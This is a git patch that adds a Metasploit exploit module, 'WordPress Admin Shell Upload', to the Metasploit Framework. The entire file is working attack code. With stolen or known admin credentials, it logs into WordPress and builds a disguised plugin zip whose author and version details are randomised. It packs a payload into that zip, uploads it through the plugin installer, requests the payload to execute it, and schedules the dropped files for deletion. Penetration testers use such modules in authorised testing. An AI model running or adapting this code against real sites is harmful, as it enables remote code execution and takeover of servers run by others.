From 7d30b214ee11fb6c81e633dfd2dfd6fc7f2dab8b Mon Sep 17 00:00:00 2001
From: rastating <rob@rastating.com>
Date: Sat, 21 Feb 2015 01:31:33 +0000
Subject: [PATCH] Add WordPress admin shell upload module

---
 .../unix/webapp/wp_admin_shell_upload.rb      | 95 +++++++++++++++++++
 1 file changed, 95 insertions(+)
 create mode 100644 modules/exploits/unix/webapp/wp_admin_shell_upload.rb

diff --git a/modules/exploits/unix/webapp/wp_admin_shell_upload.rb b/modules/exploits/unix/webapp/wp_admin_shell_upload.rb
new file mode 100644
index 0000000000..41010ea3de
--- /dev/null
+++ b/modules/exploits/unix/webapp/wp_admin_shell_upload.rb
@@ -0,0 +1,95 @@
+##
+# This module requires Metasploit: http://www.metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+require 'rex/zip'
+
+class Metasploit3 < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::FileDropper
+  include Msf::HTTP::Wordpress
+
+  def initialize(info = {})
+    super(update_info(
+      info,
+      'Name'            => 'WordPress Admin Shell Upload',
+      'Description'     => %q{
+          This module will generate a plugin, pack the payload into it
+          and upload it to a server running WordPress providing valid
+          admin credentials are used.
+        },
+      'License'         => MSF_LICENSE,
+      'Author'          =>
+        [
+          'Rob Carr <rob[at]rastating.com>' # Metasploit module
+        ],
+      'Platform'        => 'php',
+      'Arch'            => ARCH_PHP,
+      'Targets'         => [['WordPress', {}]],
+      'DefaultTarget'   => 0
+    ))
+
+    register_options(
+      [
+        OptString.new('USERNAME', [true, 'The WordPress username to authenticate with']),
+        OptString.new('PASSWORD', [true, 'The WordPress password to authenticate with'])
+      ], self.class)
+  end
+
+  def username
+    datastore['USERNAME']
+  end
+
+  def password
+    datastore['PASSWORD']
+  end
+
+  def referer_uri
+    normalize_uri(wordpress_url_backend, 'plugin-install.php?tab=upload')
+  end
+
+  def generate_plugin(plugin_name, payload_name)
+    r = Random.new
+    plugin_script = %Q{<?php
+/**
+ * Plugin Name: #{plugin_name} 
+ * Version: #{r.rand(1..20)}.#{r.rand(0..20)}.#{r.rand(0..20)}
+ * Author: #{Rex::Text.rand_text_alpha(10)}
+ * Author URI: http://#{Rex::Text.rand_text_alpha(10)}.com
+ * License: GPL2
+ */
+?>}
+
+    zip = Rex::Zip::Archive.new(Rex::Zip::CM_STORE)
+    zip.add_file("#{plugin_name}/#{plugin_name}.php", plugin_script)
+    zip.add_file("#{plugin_name}/#{payload_name}", payload.encoded)
+    zip
+  end
+
+  def exploit
+    fail_with(Failure::NotFound, 'The target does not appear to be using WordPress') unless wordpress_and_online?
+
+    print_status("#{peer} - Authenticating with WordPress using #{username}:#{password}...")
+    cookie = wordpress_login(username, password)
+    fail_with(Failure::NoAccess, 'Failed to authenticate with WordPress') if cookie.nil?
+    print_good("#{peer} - Authenticated with WordPress")
+
+    print_status("#{peer} - Preparing payload...")
+    plugin_name = Rex::Text.rand_text_alpha(10)
+    payload_name = "#{Rex::Text.rand_text_alpha(10)}.php"
+    payload_uri = normalize_uri(wordpress_url_plugins, plugin_name, payload_name)
+    zip = generate_plugin(plugin_name, payload_name)
+
+    print_status("#{peer} - Uploading payload...")
+    uploaded = wordpress_upload_plugin(plugin_name, zip.pack, cookie)
+    fail_with(Failure::UnexpectedReply, 'Failed to upload the payload') unless uploaded
+
+    print_status("#{peer} - Executing the payload at #{payload_uri}...")
+    register_files_for_cleanup(payload_name)
+    register_files_for_cleanup("#{plugin_name}.php")
+    send_request_cgi({ 'uri' => payload_uri, 'method' => 'GET' }, 5)
+  end
+end